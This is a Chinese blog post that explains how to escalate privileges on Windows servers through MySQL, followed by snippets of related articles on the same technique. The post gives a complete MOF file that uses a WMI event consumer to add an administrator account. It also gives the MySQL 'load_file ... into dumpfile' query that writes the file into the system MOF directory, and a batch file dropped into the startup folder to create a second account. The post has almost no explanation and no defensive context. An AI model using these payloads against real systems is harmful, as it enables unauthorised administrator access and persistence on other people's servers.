提权——MySQL mof提权及启动项提权简述

最新推荐文章于 2023-10-07 16:38:19 发布
最新推荐文章于 2023-10-07 16:38:19 发布
阅读量282 收藏
点赞数
分类专栏: 提权 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/z1756227332/article/details/104854958
版权

在这里插入图片描述

Mof提权的利用方法

将代码保存为.mof文件

#pragma namespace("\\\\.\\root\\subscription") 

instance of __EventFilter as $EventFilter 
{ 
    EventNamespace = "Root\\Cimv2"; 
    Name  = "filtP2"; 
    Query = "Select * From __InstanceModificationEvent " 
            "Where TargetInstance Isa \"Win32_LocalTime\" " 
            "And TargetInstance.Second = 5"; 
    QueryLanguage = "WQL"; 
}; 

instance of ActiveScriptEventConsumer as $Consumer 
{ 
    Name = "consPCSV2"; 
    ScriptingEngine = "JScript"; 
    ScriptText = 
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")"; 
}; 

instance of __FilterToConsumerBinding 
{ 
    Consumer   = $Consumer; 
    Filter = $EventFilter; 
};

在mysql中执行下面,通过查询将文件导入
select load_file(’.mof文件的路径’) into dumpfile ‘c:/windows/system32/wbem/mof/.mof(你生成的文件名)’;
导入成功后系统会自动运行该文件。

启动项提权

@echo
net user dodo dodo /add

将代码保存保存成 .bat文件
通过查询将文件导入
select load_file(’.bat文件的路径’) into dumpfile ‘该系统的启动项目录’;

当系统重启时 就会生效

霓虹灯啊
关注
专栏目录
操作系统权限提升(二十七)之数据库提权-MySQL MOF提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
09-22 598
mof是windows系统的一个“托管对象格式”文件(位置:C:/windows/system32/wbem/mof/),其作用是每隔五秒就会去监控进程创建和死亡,mof目录下有两个文件夹(good与bad)。Windows server 2003及以下系统每5秒会执行一次mof目录下的文件,执行成功会移动到good文件夹,执行失败则会移动到bad文件夹。注:MOF提权只能用于Windows系统提权,Linux提权无法使用。
mysql mof提权_MySQL提权mof提权
weixin_42498989的博客
01-19 733
mof提权原理关于 mof 提权的原理其实很简单,就是利用了 c:/windows/system32/wbem/mof/ 目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行。下面简单演示下 mof 提权的过程!MOF提权的条件要求十分严苛:1.windows 03及以下版本2.mysql启动身份具有权限去读写c:/windows...
mysqlmof提权详解
weixin_30376323的博客
01-23 204
原理解读: Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件: 方法1:运行MOF文件指定为命令行参数将Mofcomp.exe文件。方法2:使用IMofCompiler接口和$CompileFile方法。方法3:拖放到%SystemRoot%\System32\Wbem\MOF文件夹的...
MySQL启动项提权
weixin_30293135的博客
03-24 82
关于MySQL启动项提权,听其名知其意。就是将一段 VBS脚本导入到 C:\Documents and Settings\All Users\「开始」菜单\程序\启动 下,如果管理员重启了服务器,那么就会自动调用该脚本,并执行其中的用户添加及提权命令! 这里有两种思路: 1. 如果 C:\Documents and Settings\All Users\「开始」菜单\程序\启动 目录存在...
Mysql-mof提权
告白的博客
08-14 446
0x00 mof提权原理 类似于之前的udf提权,参考https://blog.csdn.net/qq_53577336/article/details/119700116 另外一种mysql提权方式叫做mof提权 在windows系统下 (在c:/windows/system32/wbem/ mof /nullevt. mof)存在一个mof文件,他的特点是,每个极短一段时间,便会以system权限自动运行文件内脚本,mof提权就是将我们写好的mof文件导入到该目录该文件里门,让他自行执行我们的语句,达到
mysql mof_mof提权
weixin_33511821的博客
02-01 309
第一次接触提权,先看了个最简单的,哈哈哈哈,看了几个视频和文章,然后整理了一下,估计很多不对的地方,等真正了解了就回来改掉。原理mof是Windows系统的一个文件,位于c:windowssystem32wbemmofnullevt.mof,叫做托管对象格式,它的作用是每隔5秒,就会去监控进程的创建和死亡。mof提权的简单利用过程就是,拥有了MySQL的root权限后,使用root权限去执行上传操...
mof提权文件nullevt.mof
03-12
其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。 mof文件通过Mofcomp....
提权mysql提权--udf、mof启动项
yang1234567898的博客
01-05 1190
1、udf提权 当获取到mysql的root权限,需要进行权限提升,可以尝试使用udf提权 首先需要查看mysql是否有导入导出功能,如果secure_file_priv为null,则无法使用udf提权,如果value值为空,则可以继续尝试 show variables like 'secure_file_priv'; secure_file_priv的value为null ,不允许导入导出 secure_file_priv的value为/dir/,只允许dir目录下导入导.
113.网络安全渗透测试—[权限提升篇11]—[Windows 2003 Mysql MOF提权]
qwsn
07-06 2136
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! mof是windows系统的一个文件,存储在,叫做"托管对象格式",其作用是每隔五秒就会去监控进程创建和死亡。然而提权的原理就是在拥有了mysql的root权限以后(其实就是获得了MySQL的启动身份),然后使用该权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs脚本段大多数写的是cmd的添加管理员用户的命令。(1)操作系统版本:Windows Server
Mysql数据库提权——MOF提权
cxrpty的博客
03-11 700
mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡,应用在win2008以下的系统,Mysql5.7以下(--secure_file_prive:此配置写文件不限制) 实验环境:windows2003 实验步骤: 一、搭建环境 在windows2003上安装3...
mysql mof提权
m0_65096687的博客
05-23 271
mof 提权的原理就是利用mof目录下的mof文件会一段时间后自动执行,且权限为system,我们就利用此处的。让他执行一些我们想要的命令。2、数据库为 mysql
mysqlmof提权
Clannad的博客
11-17 504
文章目录靶机 Server 2003use exploit/windows/mysql/mysql_mof查看需要配置的参数配置参数输入 run 或者 exploit 来执行成功拿到meterpreter回显之后,输入shell,拿下shell开启和关闭3389端口 靶机 Server 2003 use exploit/windows/mysql/mysql_mof 使用use 来调用此模块 记...
数据库提权--MOFMYSQL
最新发布
qq_45936617的博客
10-07 566
MOF提权的利用原理是利用目录下的 nullevt.mof 文件,每隔一段时间(默认5s)都会用系统权限执行一次的特性,来写入cmd命令使其被带入以系统权限执行MOF提权的使用条件是:1、secure_file_priv参数不为null2、有修改nullevt.mof 文件的权限3、数据库用户具有root权限MOF提权的步骤是有恶意语句的mof文件写入到mof目录下-->系统每隔一段时间自动执行。
MySQL提权mof提权
2301_77300311的博客
04-11 582
关于 mof 提权的原理其实很简单,就是利用了 c:/windows/system32/wbem/mof/ 目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行。MOF文件每五秒就会执行,而且是系统权限,我们通过mysql使用load_file 将文件写入/wbme/mof,然后系统每隔五秒就会执行一次我们上传的MOF。我们提权成功后,就算被删号,mof也会在五秒内将原账号重建,那么这给我们退出测试造成了很大的困扰,所以谨慎使用。
Mysql提权方法总结系列-MOF提权
kracer的博客
02-27 3239
0x01 简介 mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。 0x02 条件 mysql有读写 C:/Windows/system32/...
mysql mof提权_三、mysqlmof提权学习
weixin_32097465的博客
01-27 200
一、测试环境win2003 + phpnow二、使用条件mysql + root权限三、工具准备(1)工具1: 准备好mof提权脚本(具体mof脚本,已上传网盘)(2)工具2: 准备好菜刀(文件管理 + 数据库管理)四、提权原理上传mof提权脚本到mof默认加载目录(路径:c:/windows/system32/wbem/mof),系统会在每一分钟的某一个固定时间运行mof目录下的mof脚步文件,...
Mysql 开机启动项提权
Fly_鹏程万里
06-07 524
提权原理 利用Mysql,将后门文件写入开机自启动项,同时因为是开机自启动,再写入之后,需要重启目标服务器(这个要求mysql的权限就很高,至少是管理员权限,甚至是system),该实验只能在windows中使用。 提权方式 第一种:如果" C:\Documents and Settings\All Users\「开始」菜单\程序\启动 "目录存在可读写的权限,那么我们可以直接将VBS提权脚本上传到该目录下! ...
mysql mof_关于mysql mof提权研究
weixin_39662142的博客
01-19 89
无意中看到有关mysql的这种提权方式,趁着有空余时间便研究了起来,发现网上有挺多地方写的不够详细的,研究的时候也卡壳了一段时间。利用前提:操作系统为windows操作系统版本不宜太高,2008测试不通过,2003可(因为需要访问到system32中目录)或说mysql启动身份具有权限去访问和写入c:/windows/system32/mof目录数据库为mysql且知道mysql登录账号密码和允许...
mysql mof提权原理_mof提权原理及其过程
05-16
Mof提权的原理是通过创建一个恶意的Mof文件,并将其注册到WMI中,然后利用WMI的执行权限来执行Mof文件中的命令,从而实现提权。具体过程如下: 1. 创建一个恶意的Mof文件,并将其中的类名定义为“__EventFilter”,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值